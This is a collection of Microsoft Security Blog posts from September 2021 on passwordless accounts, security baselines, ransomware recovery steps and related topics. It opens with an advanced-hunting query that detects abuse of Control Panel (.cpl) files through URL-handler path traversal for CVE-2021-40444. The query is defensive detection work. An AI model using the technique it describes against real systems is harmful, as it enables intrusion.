  • Email messages containing malicious file removed after delivery

Advanced hunting

To locate possible exploitation activity, run the following queries.

Relative path traversal (requires Microsoft 365 Defender)

Use the following query to surface abuse of Control Panel objects (.cpl) via URL protocol handler path traversal as used in the original attack and public proof of concepts at time of publishing:

| where (FileName in~(“control.exe”,”rundll32.exe”) and ProcessCommandLine has “.cpl:”)
or ProcessCommandLine matches regex @'\".[a-zA-Z]{2,4}:\.\.\/\.\.'


The post Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability appeared first on Microsoft Security Blog.

The passwordless future is here for your Microsoft account

September 15th, 2021 No comments

Nobody likes passwords. They’re inconvenient. They’re a prime target for attacks. Yet for years they’ve been the most important layer of security for everything in our digital lives—from email to bank accounts, shopping carts to video games.

We are expected to create complex and unique passwords, remember them, and change them frequently, but nobody likes doing that either. In a recent Microsoft Twitter poll, one in five people reported they would rather accidentally “reply all”—which can be monumentally embarrassing—than reset a password.

But what alternative do we have?

For the past couple of years, we’ve been saying that the future is passwordless, and today I am excited to announce the next step in that vision. In March 2021, we announced that passwordless sign in was generally available for commercial users, bringing the feature to enterprise organizations around the world.

Beginning today, you can now completely remove the password from your Microsoft account. Use the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to your phone or email to sign in to your favorite apps and services, such as Microsoft Outlook, Microsoft OneDrive, Microsoft Family Safety, and more. This feature will be rolled out over the coming weeks.

The problem with passwords

My friend, Bret Arsenault, our Chief Information Security Officer (CISO) here at Microsoft likes to say, “Hackers don’t break in, they log in.” That has stuck with me ever since I first heard him say it because it’s so true.

Weak passwords are the entry point for the majority of attacks across enterprise and consumer accounts. There are a whopping 579 password attacks every second—that’s 18 billion every year.

Why are passwords so vulnerable? There are two big reasons.

Human nature

Except for auto-generated passwords that are nearly impossible to remember, we largely create our own passwords. But, given the vulnerability of passwords, requirements for them have gotten increasingly complex in recent years, including multiple symbols, numbers, case sensitivity, and disallowing previous passwords. Updates are often required on a regular basis, yet to create passwords that are both secure enough and memorable enough is a challenge. Passwords are incredibly inconvenient to create, remember, and manage across all the accounts in our lives.

Graphic depicting how new passwords that are secure enough are hard to remember.

Graphic depicting how a new password that is easy to remember is not secure enough.

Forgetting a password can be painful too. I was shocked to learn that nearly a third of people say they completely stop using an account or service rather than dealing with a lost password. That’s not only a problem for the person stuck in the password cycle, but also for businesses losing customers.

To solve these problems and create passwords we can remember, we try and make things easier for ourselves. We often rely on known and personal words and phrases. One of our recent surveys found that 15 percent of people use their pets’ names for password inspiration. Other common answers included family names and important dates like birthdays. We also found 1 in 10 people admitted reusing passwords across sites, and 40 percent say they’ve used a formula for their passwords, like Fall2021, which eventually becomes Winter2021 or Spring2022.

Hacker nature

Unfortunately, while such passwords may be easier to remember, they are also easier for a hacker to guess. A quick look at someone’s social media can give any hacker a head start on logging into their personal accounts. Once that password and email combination has been compromised, it’s often sold on the dark web for use in any number of attacks.

Hackers also have a lot of tools and techniques. They can use automated password spraying to try many possibilities quickly. They can use phishing to trick you into putting your credentials into a fake website. These tactics are relatively unsophisticated and have been in play for decades, but they continue to work because passwords continue to be created by humans.

Go passwordless today with a few quick clicks

First, ensure you have the Microsoft Authenticator app installed and linked to your personal Microsoft account.

Next, visit your Microsoft account, sign in, and choose Advanced Security Options. Under Additional Security Options, you’ll see Passwordless Account. Select Turn on.

Microsoft Authenticator screen showing the option to go passwordless.

Finally, follow the on-screen prompts, and then approve the notification from your Authenticator app. Once you’ve approved, you’re free from your password!

Microsoft Authenticator screen showing password has been successfully removed.

If you decide you prefer using a password, you can always add it back to your account. But I hope you’ll give passwordless a try—I don’t think you’ll want to go back.

Learn more about going passwordless

We’ve heard great feedback from our enterprise customers who have been on the passwordless journey with us. In fact, Microsoft itself is a great test case—nearly 100 percent of our employees use passwordless options to log in to their corporate accounts.

You can read more about our passwordless journey in a blog from Joy Chik, Corporate Vice President of Identity, or hear more about the benefits for people using Edge or Microsoft 365 apps from Liat Ben-Zur. To learn more about how Microsoft solutions, such as Microsoft Azure Active Directory and Microsoft Authenticator, are allowing users in organizations to forget their passwords while staying protected, join our digital event Your Passwordless Future Starts Now on October 13, 2021.

Learn more about enabling passwordless sign-in with the Microsoft Authenticator app here.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The passwordless future is here for your Microsoft account appeared first on Microsoft Security Blog.

Categories: cybersecurity, Identity Tags:

Security baseline for Microsoft Edge v93

September 13th, 2021 No comments

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 93!


We have reviewed the settings in Microsoft Edge version 93 and updated our guidance with the addition of 1 setting and the removal of 1 setting. Additionally, there is 1 setting worth mentioning. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the version 93 package from the Security Compliance Toolkit.


Enable 3DES cipher suites in TLS (added)

We are enforcing this setting to ensure it remains disabled. 3DES will be completely removed from Microsoft Edge in version 95 (around October 2021) and this policy will stop working at that point. Once it does, we will remove this setting from the baseline. If your server relies upon 3DES support, it should be updated as soon as possible to ensure that modern browsers can continue to connect.


Default Adobe Flash setting (removed)

Now that Adobe Flash support has ended and been removed from Microsoft Edge, we have removed the requirement to disable this setting.


Configure users’ ability to override feature flags (worth mentioning)

Some customers have been asking for this policy setting to further lock down what feature flag settings an end-user may configure. If this policy is configured, it can prevent users from reconfiguring Edge settings exposed by the edge://flags page and/or via command line arguments. A tech-savvy user may uncover unsupported mechanisms for adjusting feature flag settings, but this policy allows blocking both supported mechanisms.


Microsoft Edge version 93 introduced 31 new computer settings and 26 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baseline Community or this post.

Categories: Uncategorized Tags:

Afternoon Cyber Tea: Learn how to stop misinformation threats from nation-state bad actors

September 13th, 2021 No comments

Information has long been wielded as an instrument of national power and influence. In today’s digital world, misinformation can also be just as powerful.

On a special episode of Afternoon Cyber Tea with Ann Johnson, Sandra Joyce, Executive Vice President and Head of Mandiant Intelligence at FireEye joined me to talk about threat attribution and accountability when it comes to the use of technology by bad actors to help spread misinformation.

As a US Air Force Reserve officer and faculty member at the National Intelligence University with four master’s degrees in cyber policy, international affairs, science and technology intelligence, and military operational art and science, Sandra is an expert in understanding how nation-state actors leverage traditional and social media channels to erode confidence in free and fair elections. Sometimes, those bad actors will use these core values, such as freedom of speech, against us, according to Sandra. For instance, she recounts the story of a foreign group that used those values against the US by fabricating letters from concerned citizens to be published in US newspapers.

In this powerful episode, Sandra discusses how threat actors are adopting new threat techniques—shifting from signature malware to commodity malware—and pivoting to smaller malware families that they hope will be overlooked by cybersecurity professionals. That combination will make it harder to detect threats amid the noise. She recommends that organizations research threats and undertake a threat profile on themselves to learn their vulnerabilities and the biggest threats that could target them. That can shape priorities. Using the metaphor of bank robbers, she says it’s not so hard to rush the guards in a building but is hard to learn the location of the safe, get the combination to the safe, and escape undetected. The latter is where the bulk of business intrusion happens. Companies need to root out threats in that lateral stage.

During our conversation, we also spoke about threat intelligence and what’s involved in threat actor attribution. After recognizing a cluster of threat activity, there’s a lot of work required to identify which organization or country is behind the threat. It usually takes months to collect information about the threat’s techniques, infrastructure, and command and control (C2) channel, which is the channel a threat actor uses to commandeer an individual host or to control a botnet of millions of machines. For years, FireEye’s Mandiant Threat Intelligence team has been tracking financial crime group Fin11, which deploys point-of-sale malware targeting the financial, retail, restaurant, and pharmaceutical industries. Both technical indicators and the targeting information prove useful in these investigations, in part as you learn about the bad actors’ intentions. To learn what organizations can do to combat threats, listen to Afternoon Cyber Tea with Ann Johnson: Taking a “when, not if” approach to cybersecurity on Apple Podcasts or PodcastOne.

What’s next

A new season of Afternoon Cyber Tea with Ann Johnson launches this October 2021 on The CyberWire! In this important cyber series, I talk with cybersecurity influencers about trends shaping the threat landscape and explore the risk and promise of systems powered by AI, IoT, and other emerging tech.

You can listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts: You can also download the episode by clicking the Episode Website link.
  • PodcastOne: Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Learn how to stop misinformation threats from nation-state bad actors appeared first on Microsoft Security Blog.

Categories: CISO, Ciso series page, cybersecurity Tags:

Combat attacks with security solutions from Trustwave and Microsoft

September 9th, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog seriesLearn more about MISA.

In 2021, cyberattacks and instances of ransomware demands against companies, agencies, and institutions have dominated the headlines. These kinds of attacks are on the rise and often have long-reaching impacts that can spill over across supply chains. In just the first half of the year, there have been several high-profile cyberattacks in the United States including Colonial Pipeline1, JBS (the world’s largest meat supplier)2, the Washington, D.C. Police Department3, and the MTA of New York City4, to name a few.

The SolarWinds cybersecurity breach5 opened US government networks and private companies’ security systems around the world to threat actors in late 2020. This breach allowed access to confidential government data and intel before being discovered. The innovative bad actors attached their malware to a software update from SolarWinds’ Orion software in March through June of 2019, which led to tens of thousands of customers’ security being compromised. SolarWinds serves as an unfortunate example of how organizations around the world operate under the perpetual threat of becoming a target of a cyberattack or the victim of a cybercrime, even from a trusted partner.

Some believe the escalation in attacks and data breaches in the past year likely originated with new remote working environments, which exponentially increased the number of endpoints that required protection putting strain on already over-extended IT resources6.

Take a proactive approach to your security

To identify, contain, and eradicate these relentless threats properly, security operations must include effective platforms, processes, and people. With attacks on the rise and bad actors only becoming more sophisticated, security that meets the minimum is no longer effective, and organizations need to consider a more proactive approach. Microsoft Defender for Endpoint is a holistic, cloud-delivered endpoint security solution that includes risk-based vulnerability management and assessment, attack surface reduction, behavior-based next-generation protection, rich APIs, and unified security management.

Microsoft security solutions have native capability designed to work cohesively to provide integrated threat detection and response capabilities, but technology alone is not enough. The benefits derived from leveraging best-in-breed tools can mean the difference in capturing a threat or letting it linger, unnoticed in your environment indefinitely. Partnering with a Managed Detection and Response (MDR) team/Managed Security Services Provider (MSSP) who is a trusted Microsoft technology partner can help you operationalize these transformations and derive the most value from your existing technology investments.

Trustwave removes the complexity and burden of threat detection and response with an entire portfolio of cybersecurity solutions that work with existing Microsoft investments to fight cybercrime, protect data, and reduce risk. Knowing what to look for in your security partners is crucial, especially among the noise of an industry saturated with providers claiming to be the “best.” Search for partners that can offer:

  • All-day monitoring/notification, incident response, and remediation.
  • Data forensics and investigation response (DFIR).
  • Proactive, human-led threat hunting.

With organizations facing overwhelmed security teams and resource limitations, finding the time and staff to properly protect their environments—on-premises, in the cloud, or a hybrid of both—is a constant challenge. Implementing proactive endpoint detection and response (EDR) and MDR solutions can relieve your teams, prevent breaches, and appease your stakeholders. For real examples of how effective the EDR plus MDR combination can be when aligned to create a layered security posture, view Trustwave’s case study on the GoldenSpy malware or view their industry accolades showcasing the industry expertise their teams have worked to earn for the safety of organizations like yours.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1Colonial Pipeline Attack Spotlights the Importance of Ransomware Preparedness, Trustwave, 11 May 2021.

2JBS: Cyber-attack hits world’s largest meat supplier, BBC News, 02 June 2021.

3D.C. Police Department Data Is Leaked in a Cyberattack, The New York Times, 27 April 2021.

4MTA breached by hackers with reported ties to China, Kevin Duggan, MSN, 03 June 2021.

5A ‘Worst Nightmare’ Cyberattack: The Untold Story Of The SolarWinds Hack, Dina Temple-Raston, Monika Evstatieva, NPR, 16 April 2021.

6How Your Security Testing Mindset Should Change After COVID-19, Mark Whitehead, Trustwave, 04 May 2021.

The post Combat attacks with security solutions from Trustwave and Microsoft appeared first on Microsoft Security Blog.

Why diversity is important for a strong cybersecurity team

September 9th, 2021 No comments

Medicine. Aeronautics. Academia. When you’re a cybersecurity professional, the colleague next to you could have started in one of these industries—or just about any other you can imagine. The backgrounds of cybersecurity professionals are more diverse than those of professionals in other industries. And because cybersecurity as an industry is so new, these professionals likely didn’t study security in school either. That includes LinkedIn’s Chief Information Security Officer (CISO) Geoff Belknap, who graduated college with a business degree. I hosted Geoff on a recent episode of Security Unlocked with Bret Arsenault to talk about strategies for recruiting cybersecurity talent and for solving the cybersecurity skills gap.

Strengthen your cybersecurity team through diversity

Geoff, who joined LinkedIn in 2019, leads the organization’s internal security teams in building a safe, trusted, and professional platform. He brings more than 22 years of experience in network architecture and security leadership to his role at LinkedIn. He previously was the CISO at Slack, where he built the security organization from the ground up, including laying the groundwork for Slack’s production incident management process. He earned a Bachelor of Science degree in Business Management at Western Governors University. One of his favorite things about cybersecurity is that it’s a multi-disciplinary and inter-disciplinary practice where people from different specialties, including business and other non-technical backgrounds, can contribute.

One of cybersecurity’s much-discussed biggest challenges is the skills gap. The cybersecurity industry is projected to triple year-over-year through 2022, but the shortage of cybersecurity professionals is in the millions globally, according to an article in The CyberWire1. The skills gap is caused, in part, because the industry is relatively new and people don’t receive training on how to work in cybersecurity, according to Geoff. If a company wants to interview 10 candidates with 20 years of experience for a cloud security engineer role, it could be waiting for a very long time.

He recommends that organizations expand their idea of the right person for an open cybersecurity position. Stop thinking that the only person that is right for a role in cybersecurity majored in cybersecurity in college and that a principal-level network security cloud architect will be an expert in all three cloud platforms. Instead, consider people who can process and analyze a collection of information, understand your company’s technology, and understand what the organization is trying to accomplish and the tools available. Inquisitive people who are passionate about problem-solving can grow into a cybersecurity position and become effective contributors to the organization. By investing in people with useful raw skills and developing their cybersecurity skills, organizations fill roles and add valuable diverse perspectives to their cybersecurity teams.

Once you fill those cybersecurity roles, retaining employees is critical. The secret to that is always company culture, Geoff said. Compassion and empathy are not only good traits to adopt but also essentials for an organization wanting to attract and retain the best talent. Authentic organizations care about their people and recognize that they need time outside work. After all, psychologically healthy people are the best asset for any organization.

During our conversation, Geoff also shared his appreciation for the Zero Trust approach because it reinforces the idea that there is no safe haven. Security is a thought process rather than an end goal you can attain. Acknowledging that there is no castle where you can lock away your data and keep it safe makes you rethink your production environment and your risk assessment. That’s a powerful realization because it puts you on a path to explore why things aren’t as secure as they should be, according to Geoff. To learn why he thinks cybersecurity professionals from nontraditional career paths can be especially successful in a Zero Trust environment, listen to Building a Stronger Security Team on The CyberWire.

What’s next

In this important cyber series, I talk with cybersecurity peers and Microsoft leaders about today’s biggest challenges in cybersecurity and practical guidance for security practitioners.

You can listen to Security Unlocked with Bret Arsenault on:

  • Apple Podcasts, Amazon Music, Google Podcasts, and Spotify. You can also download the episode by clicking The CyberWire link below.
  • The CyberWire: Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics, such as building a security team and securing hybrid work.

To learn more, visit our website. In the meantime, bookmark the Security blog to keep up with our coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1Understanding the cybersecurity skills gap and how education can solve it, Ingrid Toppelberg, The CyberWire, 19 April 2021.

The post Why diversity is important for a strong cybersecurity team appeared first on Microsoft Security Blog.

Categories: CISO, Ciso series page, cybersecurity Tags:

Windows Server 2022 Security Baseline

September 9th, 2021 No comments

We are pleased to announce the release of the security baseline package for Windows Server 2022!


Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and customize / implement as appropriate.


Three new settings have been added for this release, an AppLocker update for Microsoft Edge, a new Microsoft Defender Antivirus setting, and a custom setting for printer driver installation restrictions.



Now that Microsoft Edge is included within Window Server we have updated the domain controller browser restriction list. The browser restriction list now restricts Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, and Microsoft Edge. Should additional browsers be used on your domain controllers please update accordingly.


Script Scanning

Script scanning was a parity gap we had between Group Policy and MDM. Since this gap is now closed we are enforcing the enablement of script scanning (Administrative Templates\Microsoft Defender Antivirus\Real-time Protection\Turn on script-scanning).


Restrict Driver Installations

In July a Knowledge Base article and subsequent patch was released for CVE-2021-34527, more commonly known as “PrintNightmare”. We have added a new setting to the MS Security Guide custom administrative template for SecGuide.admx/l (Administrative Templates\MS Security Guide\Limits print driver installation to Administrators) and enforced the enablement.


Please let us know your thoughts by commenting on this post or via the Security Baseline Community.

Categories: Uncategorized Tags:

Coordinated disclosure of vulnerability in Azure Container Instances Service

September 8th, 2021 No comments

Microsoft recently mitigated a vulnerability reported by a security researcher in the Azure Container Instances (ACI). Our investigation surfaced no unauthorized access to customer data. Out of an abundance of caution we notified customers with containers running on the same clusters as the researchers via Service Health Notifications in the Azure Portal. If you did not receive a notification, no action is required with respect to this vulnerability.

Categories: Azure Tags:

3 steps to prevent and recover from ransomware

September 7th, 2021 No comments

On July 14, 2021, the National Cybersecurity Center of Excellence1 (NCCoE) at the National Institute of Standards and Technology2 (NIST) hosted a virtual workshop3 to seek feedback from government and industry experts on practical approaches to preventing and recovering from ransomware and other destructive cyberattacks. After we wrote up our feedback for NIST, we realized it would be helpful to share this perspective more broadly to help organizations better protect themselves against the rising tide of (highly profitable) ransomware attacks. While ransomware and extortion attacks are still evolving rapidly, we want to share a few critical lessons learned and shed some light on common misconceptions about ransomware attacks.

Clarifying attack terminology and scope

One common misconception about ransomware attacks is that they only involve ransomware—”pay me to get your systems and data back”—but these attacks have actually evolved into general extortion attacks. While ransom is still the main monetization angle, attackers are also stealing sensitive data (yours and your customers’) and threatening to disclose or sell it on the dark web or internet (often while holding onto it for later extortion attempts and future attacks).

We’re also seeing a widespread perception that ransomware is still constrained to basic cryptolocker style attacks, first seen in 2013, that only affect a single computer at a time (also known as the commodity model). Today’s attackers have evolved far beyond this—using toolkits and sophisticated affiliate business models to enable human operators to target whole organizations, deliberately steal admin credentials, and maximize the threat of business damage to targeted organizations. The ransomware operators often buy login credentials to organizations from other attack groups, rapidly turning what seems like low-priority malware infections into significant business risks.

Simple, prioritized guidance

We’ve also seen that many organizations still struggle with where to start, especially smaller operations with limited staff and experience. We believe all organizations should begin with simple and straightforward prioritization of efforts (three steps) and we have published this, along with why each priority is important.

Microsoft's recommended mitigation prioritizations: prepare, limit, and prevent.

Figure 1: Recommended mitigation prioritization.

Create detailed instructions

Microsoft has also found that many organizations struggle with the next level of the planning process. As a result, we built guidance to make following these steps as clear and easy as possible. Microsoft already works with NIST NCCoE on several efforts, including the Zero Trust effort, which supports Presidential Executive Order (EO) 14028 on Improving the Nation’s Cybersecurity. We welcome the opportunity for any additional ransomware-related work by providing clarifying guidance using whatever tools and technologies organizations have available.

Secure backup instructions from Microsoft's human-operated ransomware page.

Figure 2: Secure backup instructions from Microsoft’s human-operated ransomware page.

Microsoft’s recommended mitigation prioritization

Based on our experience with ransomware attacks, we’ve found that prioritization should focus on these three steps: prepare, limit, and prevent. This may seem counterintuitive since most people want to simply prevent an attack and move on. But the unfortunate truth is that we must assume breach (a key Zero Trust principle) and focus on reliably mitigating the most damage first. This prioritization is critical because of the high likelihood of a worst-case scenario with ransomware. While it’s not a pleasant truth to accept, we’re facing creative and motivated human attackers who are adept at finding a way to control the complex real-world environments in which we operate. Against that reality, it’s important to prepare for the worst and establish frameworks to contain and prevent attackers’ abilities to get what they’re after.

While these priorities should govern what to do first, we encourage organizations to run as many steps in parallel as possible (including pulling quick wins forward from step three whenever you can).

Step 1. Prepare a recovery plan: Recover without paying

  • What: Plan for the worst-case scenario and expect that it will happen at any level of the organization.
  • Why: This will help your organization:
    • Limit damage for the worst-case scenario: Restoring all systems from backups is highly disruptive to business, but it’s still more efficient than trying to do recovery using low-quality attacker-provided decryption tools after paying to get the key. Remember: paying is an uncertain path; you have no guarantee that the attackers’ key will work on all your files, that the tools will work effectively, or the attacker—who may be an amateur using a professional’s toolkit—will act in good faith.
    • Limit the financial return for attackers: If an organization can restore business operations without paying, the attack has effectively failed and resulted in zero return on investment for the attackers. This makes it less likely they will target your organization again in the future (and deprives them of funding to attack others). Remember: attackers may still attempt to extort your organization through data disclosure or abusing/selling the stolen data, but this gives them less leverage than possessing the only means of accessing your data and systems.
  • How: Organizations should ensure they:
    • Register risk. Add ransomware to the risk register as a high-likelihood and high-impact scenario. Track mitigation status via your Enterprise Risk Management (ERM) assessment cycle.
    • Define and backup critical business assets. Automatically back up critical assets on a regular schedule, including correct backup of critical dependencies, such as Microsoft Active Directory.
    • Protect backups. To safeguard against deliberate erasure and encryption, use offline storage, immutable storage, and/or out-of-band steps (multifactor authentication or PIN) before modifying or erasing online backups.
    • Test ‘recover from zero’ scenario. Ensure that your business continuity and disaster recovery (BC/DR) can rapidly bring critical business operations online from zero functionality (all systems down). Conduct practice exercises to validate cross-team processes and technical procedures, including out-of-band employee and customer communications (assume all email and chat are down). Important: protect (or print) supporting documents and systems required for recovery, including restoration-procedure documents, configuration management databases (CMDBs), network diagrams, and SolarWinds instances. Attackers regularly destroy these documents.
    • Reduce on-premises exposure. Move data to cloud services with automatic backup and self-service rollback.

Step 2. Limit the scope of damage: Protect privileged roles (starting with IT admins)

  • What: Ensure you have strong controls (prevent, detect, respond) for privileged accounts, such as IT admins and other roles with control of business-critical systems.
  • Why: This slows or blocks attackers from gaining complete access to steal and encrypt your resources. Taking away the attacker’s ability to use IT admin accounts as a shortcut to resources will drastically lower the chances that they’ll be successful in controlling enough resources to impact your business and demand payment.
  • How: Enable elevated security for privileged accounts—tightly protect, closely monitor, and rapidly respond to incidents related to these roles. See Microsoft’s recommended steps that:
    • Cover end-to-end session security (including multifactor authentication for admins).
    • Protect and monitor identity systems.
    • Mitigate lateral traversal.
    • Promote rapid threat response.

Step 3. Make it harder to get in: Incrementally remove risks

  • What: Prevent a ransomware attacker from entering your environment, as well as rapidly respond to incidents and remove attacker access before they can steal and encrypt data.
  • Why: This causes attackers to fail earlier and more often, undermining their profits. While prevention is the preferred outcome, it may not be possible to achieve 100 percent prevention and rapid response across a real-world organization with a complex multi-platform, multi-cloud estate and distributed IT responsibilities.
  • How: Identify and execute quick wins that strengthen security controls to prevent entry and rapidly detect and evict attackers, while implementing a sustained program that helps you stay secure. Microsoft recommends following the principles outlined in the Zero Trust strategy. Against ransomware, organizations should prioritize:
    • Improving security hygiene by reducing the attack surface and focusing on vulnerability management for assets in their estate.
    • Implementing protection, detection, and response controls for digital assets, as well as providing visibility and alerting on attacker activity while responding to active threats.

The takeaway

To counter the threat of ransomware, it’s critical to identify, secure, and be ready to recover high-value assets—whether data or infrastructure—in the likely event of an attack. This requires a sustained effort involving obtaining buy-in from the top level of your organization (like the board) to get IT and security stakeholders working together asking nuanced questions. For example, what are the critical parts of the business that could be disrupted? Which digital assets map to these business segments (files, systems, databases)? How can we secure these assets? This process may be challenging, but it will help set up your organization to make impactful changes using the steps recommended above.

To learn more, visit our page on how to rapidly protect against ransomware and extortion.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1National Cybersecurity Center of Excellence.

2National Institute of Standards and Technology, US Department of Commerce.

3Virtual Workshop on Preventing and Recovering from Ransomware and Other Destructive Cyber Events, National Cybersecurity Center of Excellence, 14 July 2021.

The post 3 steps to prevent and recover from ransomware appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags: